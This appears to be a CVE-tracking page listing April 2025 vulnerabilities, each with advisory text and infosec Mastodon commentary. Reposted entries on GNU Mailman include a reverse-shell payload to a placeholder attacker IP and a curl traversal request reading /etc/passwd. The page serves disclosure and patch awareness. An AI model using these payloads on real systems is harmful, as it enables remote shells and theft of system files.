Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

nvd.nist.gov/vuln/detail/CVE-2

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

nvd.nist.gov/vuln/detail/CVE-2

##

_r_netsec@infosec.exchange at 2025-04-25T13:28:06.000Z ##

Remote Code Execution on Viasat Modems (CVE-2024-6198) onekey.com/resource/security-a

##

CVE-2025-43946
(9.8 CRITICAL)

EPSS: 0.29%

updated 2025-04-25T15:31:21

1 post

TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload (combined with Path Traversal).

cR0w@infosec.exchange at 2025-04-22T18:57:47.000Z ##

Go hack more AI shit.

TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload (combined with Path Traversal).

github.com/Henkel-CyberVM/CVEs

In case you don't know what TCPWave DDI is, this is the big banner on their homepage:

Easy To Use DDI Powered with
Alice Chatbot
Core DDI with Advanced Threat Intelligence to mitigate risks

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32431
(CVSS UNKNOWN)

EPSS: 0.07%

updated 2025-04-25T14:41:50

1 post

## Impact There is a potential vulnerability in Traefik managing the requests using a `PathPrefix`, `Path` or `PathRegex` matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a `/../` in its path, it’s possible to target a backend, exposed using another router, bypassing the middlewares chain. ## Example ```yaml apiVersi

cR0w@infosec.exchange at 2025-04-21T16:42:17.000Z ##

A ../ in a popular reverse proxy and load balancer? Happy Monday! But at least we now know for sure how to pronounce it when we report it to the various teams.

github.com/traefik/traefik/sec

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. In versions prior to 2.11.24, 3.3.6, and 3.4.0-rc2, there is a potential vulnerability in Traefik managing the requests using a PathPrefix, Path or PathRegex matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a /../ in its path, it’s possible to target a backend, exposed using another router, bypassing the middlewares chain. This issue has been patched in versions 2.11.24, 3.3.6, and 3.4.0-rc2. A workaround involves adding a PathRegexp rule to the matcher to prevent matching a route with a /../ in the path.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46616
(10.0 CRITICAL)

EPSS: 0.18%

updated 2025-04-25T09:31:56

1 post

Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) via upload of a file. This affects StorNext RYO before 7.2.4, StorNext Xcellis Workflow Director before 7.2.4, and ActiveScale Cold Storage.

cR0w@infosec.exchange at 2025-04-25T13:23:41.000Z ##

I thought quantum was supposed to save security or something?

quantum.com/en/service-support

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) via upload of a file. This affects StorNext RYO before 7.2.4, StorNext Xcellis Workflow Director before 7.2.4, and ActiveScale Cold Storage.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43859
(9.1 CRITICAL)

EPSS: 0.03%

updated 2025-04-24T21:41:39

1 post

### Impact

A leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions.

### Details

HTTP/1.1 Chunked-Encoding bodies are formatted as a sequence of "chunks", each of which consists of:

- chunk length
- `\r\n`
- `length` bytes of content
- `\r\n`

In versions of h11 up to 0.14.0, h11 instead parsed them

cR0w@infosec.exchange at 2025-04-24T19:09:02.000Z ##

HTTP Smuggling in Python h11.

github.com/python-hyper/h11/se

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-32752
(9.1 CRITICAL)

EPSS: 0.21%

updated 2025-04-24T21:32:50

1 post

Under certain circumstances, communications between the ICU tool and an iSTAR Pro door controller are susceptible to Machine-in-the-Middle attacks, which could impact door control and configuration.

cR0w@infosec.exchange at 2025-04-24T20:08:25.000Z ##

Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.

johnsoncontrols.com/-/media/pr

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue.

nvd.nist.gov/vuln/detail/CVE-2

This other advisory from last June was also updated today.

johnsoncontrols.com/-/media/pr

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-26382
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2025-04-24T21:31:54

2 posts

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue.

beyondmachines1@infosec.exchange at 2025-04-25T13:01:35.000Z ##

Johnson Controls reports critical vulnerability in ICU tool

A critical stack-based buffer overflow vulnerability (CVE-2025-26382, CVSS 9.8) in Johnson Controls' ICU tool affects versions prior to 6.9.5, allowing unauthenticated remote attackers to execute arbitrary code and potentially gain complete system control.

**If you are using Johnson Controls' ICU tool, the usual rules apply - Make sure it's isolated from the internet and accessible only from trusted networks. Then plan a patch, because every isolation can be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

cR0w@infosec.exchange at 2025-04-24T20:08:25.000Z ##

Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.

johnsoncontrols.com/-/media/pr

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue.

nvd.nist.gov/vuln/detail/CVE-2

This other advisory from last June was also updated today.

johnsoncontrols.com/-/media/pr

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43858
(9.2 CRITICAL)

EPSS: 0.02%

updated 2025-04-24T19:20:07

1 post

## Summary

This vulnerability only applies when running on a Windows OS. An unsafe conversion of arguments allows the injection of malicious commands when starting `yt-dlp` from a command prompt.

> [!CAUTION]
> **NOTE THAT DEPENDING ON THE CONTEXT AND WHERE THE LIBRARY IS USED, THIS MAY HAVE MORE SEVERE CONSEQUENCES. FOR EXAMPLE, A USER USING THE LIBRARY LOCALLY IS A LOT LESS VULNERABLE THAN AN A

cR0w@infosec.exchange at 2025-04-24T19:07:19.000Z ##

I've heard of people around here using youtube-dl. If you use the Youtube-DLSharp wrapper for it, heads-up.

github.com/Bluegrams/YoutubeDL

sev:CRIT 9.2 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L

YoutubeDLSharp is a wrapper for the command-line video downloaders youtube-dl and yt-dlp. In versions starting from 1.0.0-beta4 and prior to 1.1.2, an unsafe conversion of arguments allows the injection of malicious commands when starting yt-dlp from a command prompt running on Windows OS with the UseWindowsEncodingWorkaround value defined to true (default behavior). If a user is using built-in methods from the YoutubeDL.cs file, the value is true by default and a user cannot disable it from these methods. This issue has been patched in version 1.1.2.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43928
(5.8 MEDIUM)

EPSS: 0.04%

updated 2025-04-24T18:32:12

2 posts

In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654) allows reading arbitrary files via ../ directory traversal in the username field. Reading ServerParameters.xml may reveal administrator credentials in cleartext or with MD5 hashing.

0x40k@infosec.exchange at 2025-04-25T10:18:45.000Z ##

Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.

First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.

Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.

It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️

So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!

#Cybersecurity #Pentest #PathTraversal #RCE

##

cR0w@infosec.exchange at 2025-04-20T16:02:30.000Z ##

../ in LEA shit? Huh.

h/t @varbin

mint-secure.de/path-traversal-

cfp.eh22.easterhegg.eu/eh22/ta

sev:MED 5.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

But the reporter disagrees, which seems to be a theme lately. They claim it should be: sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654) allows reading arbitrary files via ../ directory traversal in the username field. Reading ServerParameters.xml may reveal administrator credentials in cleartext or with MD5 hashing.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-28020
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 post

TOTOLINK A800R V4.1.2cu.5137_B20200730 was found to contain a buffer overflow vulnerability in downloadFile.cgi through the v25 parameter.

CVE-2025-28021
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 post

TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vulnerability in the downloadFile.cgi through the v14 and v3 parameters.

CVE-2025-28028
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 post

TOTOLINK A830R V4.1.2cu.5182_B20201102, A950RG V4.1.2cu.5161_B20200903, A3000RU V5.9c.5185_B20201128, and A3100R V4.1.2cu.5247_B20211129 were found to contain a buffer overflow vulnerability in downloadFile.cgi through the v5 parameter.

CVE-2025-28022
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 post

TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vulnerability in downloadFile.cgi through the v25 parameter.

CVE-2025-27820
(7.5 HIGH)

EPSS: 0.01%

updated 2025-04-24T16:36:11

1 post

A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release.

cR0w@infosec.exchange at 2025-04-24T13:09:16.000Z ##

Another Apache vuln, this time in HttpClient.

lists.apache.org/thread/55xhs4

A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43919
(5.8 MEDIUM)

EPSS: 0.16%

updated 2025-04-24T16:22:37.117000

3 posts

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to read arbitrary files via ../ directory traversal at /mailman/private/mailman (aka the private archive authentication endpoint) via the username parameter.

2 repos

https://github.com/cybersecplayground/CVE-2025-43919-POC

https://github.com/0NYX-MY7H/CVE-2025-43919

cR0w@infosec.exchange at 2025-04-21T13:28:40.000Z ##

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

nvd.nist.gov/vuln/detail/CVE-2

There was also a nice ../ to go with it:

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

nvd.nist.gov/vuln/detail/CVE-2

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

github.com/0NYX-MY7H/CVE-2025-

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

##

cR0w@infosec.exchange at 2025-04-20T13:23:44.000Z ##

Well if that command injection wasn't enough for you, how about a nice sev:CRIT ../ to go with it? Happy Easter.

github.com/0NYX-MY7H/CVE-2025-

There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.

github.com/0NYX-MY7H/CVE-2025-

Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

#directoryTraversalMemes

##

cR0w@infosec.exchange at 2025-04-20T01:37:05.000Z ##

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

nvd.nist.gov/vuln/detail/CVE-2

There are a couple more in Mailman while we're here:

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43920
(5.4 MEDIUM)

EPSS: 0.12%

updated 2025-04-24T16:20:36.953000

2 posts

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), in certain external archiver configurations, allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

1 repo

https://github.com/0NYX-MY7H/CVE-2025-43920

cR0w@infosec.exchange at 2025-04-21T13:28:40.000Z ##

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

nvd.nist.gov/vuln/detail/CVE-2

There was also a nice ../ to go with it:

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

nvd.nist.gov/vuln/detail/CVE-2

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

github.com/0NYX-MY7H/CVE-2025-

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

##

cR0w@infosec.exchange at 2025-04-20T01:37:05.000Z ##

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

nvd.nist.gov/vuln/detail/CVE-2

There are a couple more in Mailman while we're here:

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43921
(5.3 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T16:16:59.597000

3 posts

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to create lists via the /mailman/create endpoint.

1 repo

https://github.com/0NYX-MY7H/CVE-2025-43921

cR0w@infosec.exchange at 2025-04-21T13:28:40.000Z ##

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

nvd.nist.gov/vuln/detail/CVE-2

There was also a nice ../ to go with it:

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

nvd.nist.gov/vuln/detail/CVE-2

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

github.com/0NYX-MY7H/CVE-2025-

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

##

cR0w@infosec.exchange at 2025-04-20T13:23:44.000Z ##

Well if that command injection wasn't enough for you, how about a nice sev:CRIT ../ to go with it? Happy Easter.

github.com/0NYX-MY7H/CVE-2025-

There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.

github.com/0NYX-MY7H/CVE-2025-

Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

#directoryTraversalMemes

##

cR0w@infosec.exchange at 2025-04-20T01:37:05.000Z ##

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

nvd.nist.gov/vuln/detail/CVE-2

There are a couple more in Mailman while we're here:

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43855
(CVSS UNKNOWN)

EPSS: 0.07%

updated 2025-04-24T16:03:58

1 post

### Summary

An unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server.

### Details

Any tRPC 11 server with WebSocket enabled with a `createContext` method set is vulnerable. Here is an example: https://github.com/user-attachments/assets/ce1b2d32-6103-4e54-8446-51535b293b05

cR0w@infosec.exchange at 2025-04-24T14:59:58.000Z ##

DoS in tRPC.

github.com/trpc/trpc/security/

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

tRPC allows users to build & consume fully typesafe APIs without schemas or code generation. In versions starting from 11.0.0 to before 11.1.1, an unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server. Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. This issue has been patched in version 11.1.1.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-30408
(6.7 MEDIUM)

EPSS: 0.01%

updated 2025-04-24T15:31:46

1 post

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

cR0w@infosec.exchange at 2025-04-24T14:09:03.000Z ##

LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).

security-advisory.acronis.com/

sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

security-advisory.acronis.com/

sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46421
(6.8 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T15:31:44

1 post

A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, they mistakenly send the HTTP Authorization header to the new host that the redirection points to. This allows the new host to impersonate the user to the original host that issued the redirect.

cR0w@infosec.exchange at 2025-04-24T14:10:02.000Z ##

I'm tired of soup, but this one is kind of fun.

A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, they mistakenly send the HTTP Authorization header to the new host that the redirection points to. This allows the new host to impersonate the user to the original host that issued the redirect.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-30409
(5.5 MEDIUM)

EPSS: 0.01%

updated 2025-04-24T15:31:44

1 post

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

cR0w@infosec.exchange at 2025-04-24T14:09:03.000Z ##

LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).

security-advisory.acronis.com/

sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

security-advisory.acronis.com/

sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-3872
(7.2 HIGH)

EPSS: 0.02%

updated 2025-04-24T12:31:35

1 post

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection. A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload. This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25,

cR0w@infosec.exchange at 2025-04-24T13:11:24.000Z ##

This SQLi in Centreon Web is from a month ago but the CVE was published today.

thewatch.centreon.com/latest-s

sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.

A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.

This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-12244
(4.3 MEDIUM)

EPSS: 0.01%

updated 2025-04-24T09:30:40

1 post

An issue has been discovered in access controls that could allow users to view certain restricted project information even when related features are disabled in GitLab EE, affecting all versions from 17.7 prior to 17.9.7, 17.10 prior to 17.10.5, and 17.11 prior to 17.11.1.

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-1908
(7.7 HIGH)

EPSS: 0.01%

updated 2025-04-24T09:30:40

1 post

An issue has been discovered in GitLab EE/CE that could allow an attacker to track users' browsing activities, potentially leading to full account take-over, affecting all versions from 16.6 before 17.9.7, 17.10 before 17.10.5, and 17.11 before 17.11.1.

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-0639
(6.5 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T09:30:40

1 posts

An issue has been discovered affecting service availability via issue preview in GitLab CE/EE affecting all versions from 16.7 before 17.9.7, 17.10 before 17.10.5, and 17.11 before 17.11.1.

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

